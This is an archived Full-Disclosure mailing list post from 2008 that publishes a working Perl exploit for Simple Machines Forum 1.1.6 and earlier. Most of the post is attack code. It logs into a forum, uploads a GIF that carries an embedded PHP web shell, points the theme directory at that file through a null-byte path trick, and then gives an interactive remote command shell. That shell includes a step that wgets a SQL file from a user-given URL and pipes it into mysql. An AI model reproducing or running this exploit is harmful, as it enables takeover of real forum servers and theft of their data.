lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <20081106035719.837932803B@smtp.hushmail.com>
Date: Wed, 05 Nov 2008 22:57:19 -0500
From: elmysterio@...hmail.com
To: full-disclosure@...ts.grok.org.uk
Subject: [0day] Simple Machines Forum * <= 1.1.6 Code
	Execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that
killed rgod.
#         We can't thank you enough for killing a bug killer.
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/
magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#
# C:\Documents and Settings\molest>perl
P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd@...32]$ ver
#
# Microsoft Windows XP [Version 5.1.2600]
#
# [cmd@...32]$
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla
FireFox" );
my %parms = (	s => "",
        		d => 0,
        		x => sub { print "[**] Proxy found, using $_[1]\n"; $ua-
>proxy(['http'], $_[1]); },
        		u => "Gl0ria!!!",
        		p => "gl0ria\@herb3st" );

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";

if( !$parms{s} ) {
		die <<HELP
[ii] usage: $0 <parms>
	[-s]    Site        -> http://site.com/forums
	[-x]	Proxy       -> localhost:8118
	[-u]	Username    -> Gl0ria!!!
	[-p]    Password    -> gl0ria\@herb3st
	[-d]    Debug
HELP
}

my $shell =
chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
			chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
			chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
			chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00); $shell .= <<'EXIF';
<?php
 error_reporting(0);ini_set('max_execution_time',0);
 $x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe
_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' :
'0');
 if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
 print '---1243---';if($z){print eval($x);}else{print
passthru($x);}print '---3421---';exit;
?>
EXIF
			$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
			chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
			chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
			chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
			chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
			chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
			chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
			chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
			chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
			chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
			chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
			chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
			chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
			chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
			chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
			chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
			chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
			chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
			chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
			chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
			chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
			chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
			chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
			chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
			chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
			chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
			chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
			chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
			chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
			chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
			chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
			chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
			chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
			chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
			chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
			chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
			chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
			chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
			chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
			chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
			chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
			chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
			chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
			chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
			chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
			chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
			chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
			chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
			chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
			chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
			chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
			chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
			chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
			chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
		[
			user			=> $parms{u},
			passwrd			=> $parms{p},
			cookielength	=> -1
		]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

die "[!!] Wrong username/password\n"
	unless $ret->as_string !~ /The user whose profile you are trying
to view does not exist/;

die "[!!] Error getting session id\n"
	unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;

die "[!!] Error getting id\n"
	unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
$ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => "echo expl0ited");

&shell
	if $ret->as_string =~ /expl0ited/;

$ret = $ua->request(
		POST "$parms{s}/index.php?action=profile2",
		Content_Type	=> 'multipart/form-data',
		Content			=>
		[
			avatar_choice	=> "upload",
			sc				=> $sid,
			userID			=> $id,
			sa				=> "forumProfile",
			attachment		=>
			[
				undef,
				"expl0ited.gif",
				Content         => $shell,
				"Content-Type"	=> "image/gif"
			]
		]);

## Updating Settings.php
$ret = $ua-
>get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=them
e_dir;val=./attachments/avatar_${id}.gif\%2500");

print "[ii] Uploaded a shell...\n"
    if $parms{d};

shell();

## lulz @ this shit.
sub shell {
	my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => '0998' );
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---
/s;

	die "[!!] magic_quotes is turned on\n"
		if (not defined $os or not defined $sh or $1 eq $id);

    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";

    do {
		print "[$sh\@$os]\$ ";
		$cmd = chomp (my $cmd = <STDIN>);


		exit
			unless $cmd !~ /^exit$/i;

        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else { undef $file; }

        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?)
(.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --
password=$pass < $base; rm $base;";
        }

        $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";

        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to
file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
	} while( $cmd !~ /^exit$/i );

	exit;
}
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkkSax8ACgkQxKkly4PzmN6NRwP/eL/Q6zKYoeuNmOlPk8QMesJjVUu5
oe+zFmLwOBexDYI0JRSUqPSyDglh9JsD270gwLMzwoE1jeg8tmeLtI6QmgTIXL+D0e6X
S/XQ+UFA6+2lq5QwGSOZpstbQAqgvM/rmynP0ayeu23Gmk9yMiOq32jgHRiBRDl1S/EW
6uD17+4=
=/Wd7
-----END PGP SIGNATURE-----

--
Aching back? Sore neck? Cick to learn how to manage your pain.
http://tagline.hushmail.com/fc/Ioyw6h4fPGBbhjqD6loOAXpR5I2hoUFDQcz2E2xsVbU1vXNQPDxTZ2/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ